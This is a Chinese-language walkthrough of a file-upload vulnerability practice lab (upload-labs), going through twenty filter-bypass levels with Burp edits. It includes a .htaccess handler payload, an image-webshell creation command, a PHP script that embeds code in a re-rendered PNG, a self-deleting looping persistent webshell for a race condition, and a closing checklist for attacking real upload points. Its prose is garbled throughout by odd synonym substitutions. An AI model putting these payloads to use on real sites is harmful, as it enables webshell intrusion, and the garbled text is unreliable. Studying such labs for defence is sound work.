右键查看网页源代码,创造在上传时候调用了checkFile方法进行了检讨,如果检讨失落败会返回false导致上传失落败
三种办理方法实在是4种,但是禁用前端js可能造成很多麻烦我们去掉这种抓包修正文件类型将shell的后缀改为jpg绕过前端验证,抓包时在改回php
burp修正response返回值刷新第一关页面,burp抓包拦截response包
将onsubmit直接删除,或者将checkFile改为return true都可以绕过
通过保存源代码修正action
原来网页代码是没有action的,如果没有action默认便是发送到本页面,我们修正function然后添加一个action就可以上传成功
第二关:content-type类型绕过这关判断了content-type类型,如果知足才可以上传否则就会出错
抓包将修正类型上传成功
第三关:黑名单验证绕过
在这之前修正apache下的httpd.conf文件,将这条的注释去掉,代表php文件 phtml文件都可以解析为php ,当然我们也可以自己添加文件类型
我们看一下源码
因此我们可以上传phtml来绕过黑名单验证
第四关:.htaccess绕过
这关的源码实在和上一关相同,只不过涌现了许多黑名单
修正配置文件,原来是none改为all,重启apache
我们首先上传一个名字为.htaccess的文件
<FilesMatch "4"> //意思为和这个文件同目录的文件,只要名字中带有4都会被当做php解析SetHandler application/x-httpd-php</FilesMatch>
上传文件名为114.png文件,带有4以是被解析成php
第五关:大小写绕过
第五关源码:
比拟第三关源码少了一个大小写转换
由于他没有禁止大写,直接大写后缀上传
第六关:后缀去空绕过
这关源码由于没有去掉末了的空格,因此在和数组进行比较时会匹配失落败,导致上传成功,上传上的文件由于系统会自动把后边的空格去掉,形成一个可以解析的php后缀
burp抓包多加一个空格
上传成功
第七关:后缀加点绕过
和第六关思路一样,绕过之后系统会自动把点去掉
第八关:::$DATA绕过
在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的便是不检讨后缀名网站没有过滤::$DATA,我们可以绕过
第九关:双写.(空格).绕过
这关把所有的都验证了,但是他是顺序实行只实行了一次 我们在shell.php后加上.(空格). 先删除一个点,然后末了去除空格,但是前面还有一个点没有去掉,导致绕过
第十关:双写绕过
将文件名和数组中进行匹配,如果匹配上则把匹配内容改位空字符串我们可以双写php绕过 pphphp
实在上面这几关全部可以用php..绕过,但是大家还是老诚笃实的用该当的方法练习一遍最好
第十一关:GET %00截断绕过00截断是当程序碰着00时会自动停滞不再解析之后的内容,试用php5.3一下的版本,我们把版本切换到5.2.17踩坑:须要把magic_quotes_gpc参数关闭,把稳默认便是关闭的!
!
但是我考试测验了还是不能成功,如果你也碰着这种情形,咱们打开之后再给他关闭一下就可以了。上传路径可控,修正上传路径00截断上传成功
由于是根据上传路径拼接的,以是不能在文件名的地方进行00截断
第十二关:POST %00截断绕过
这次的上传路径地址是post方法发送的
get和post的差异便是get能自动url解码,而post却不能,因此我们要在burp里对%00进行解码
上传成功
十三、十四关:图片马合营文件上传漏洞
利用命令天生图片马
copy a.jpg /b + cc.php /a shell.jpg
上传成功之后利用include.php文件包含成功
十五关:和13、14关相同
操作一样。但是须要打开php_exif,本函数可用来避免调用其它 exif 函数用到了不支持的文件类型上或和 $_SERVER['HTTP_ACCEPT'] 结合利用来检讨浏览器是否可以显示某个指定的图像。
十六关:二次渲染绕过imagecreatefrompng PNG 文件或 URL 新建一图像二次渲染便是我们上传图像之后,创造图片某些位置被删除了,导致我们的命令不能成功实行,于是我们要把渲染过后的文件保存出来,利用16进制编辑器和没渲染的位置进行比拟,找到不变的位置,在这里插入我们的恶意代码我们上传图片马之后创造已经解析失落败了
渲染后的文件
渲染前的文件
但是手工插入很难成功,我们利用脚本
<?php$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img,'./1.png');?>
我们找到php 目录 实行 php 1.php 就会给我们天生一个1.png文件010editor打开
之后利用这种形式传参就可以成功实行命令
十七关:条件竞争漏洞
须要用到不去世马
<?phpignore_user_abort(true); set_time_limit(0); @unlink(__FILE__); $file = '555.php'; $code = '<?php phpinfo();?>'; while (1){ file_put_contents($file,$code); usleep(5000); }?>
我们看代码他是先将图片上传上去,才开始进行判断后缀名、二次渲染。如果我们在上传上去的一瞬间访问这个文件,那他就不能对这个文件删除、二次渲染。这就相称于我们打开了一个文件,然后再去删除这个文件,就会提示这个文件在另一程序中打开无法删除。
由于代码是先移动文件位置在对文件做判断,我们可以利用Burp一直抓包,利用判断之前的间隙运行成功不去世马
一个用于访问路径,一个用于上传,返回值200表示已经天生好了内存马
十八关:条件竞争漏洞合营解析漏洞和十七关相同,只不过要用解析漏洞的路径
十九关:move_uploaded_file()特性绕过move_uploaded_file()有这么一个特性,会忽略掉文件末端的 /.以是我们把他修正为如图所示
成功访问
第二十关:数组绕过
问题出在这里,reset是获取第一个元素但是如果我们传的参数为
$file=>{'0'=>'upload20.php/''2'=>'jpg'}
php的数组既可以当数组又可以当字典,这里实在是字典的用法这时候呢reset函数取出第一个值是upload20.php 和点拼接 然后count获取长度为2 ,然后2-1为1 但是file数组中没有Key值为1的数字,以是返回为空 以是文件名为upload20.php/ 而$ext获取的是末了面的值因而为jpg也绕过了判断
上传成功
总结
条件: 探求一个上传点,查看上传点是否可用。利用: 首先判断是程序员自己写的上传点,还是编辑器的上传功能 如果是编辑器上传功能,goolge当前编辑器的漏洞 如果是程序员写的上传点 上传一个正常的jpg图片 查看上传点是否可用 上传一个正常的jpg图片,burp拦截,修正后缀为php (可以检测前端验证 MIME检测 文件内容检测 后缀检测) 上传一个正常的jpg图片,burp拦截, 00截断 1.php%00.jpg 判断做事器是什么类型,web做事器程序,是什么类型,版本号多少 利用解析漏洞
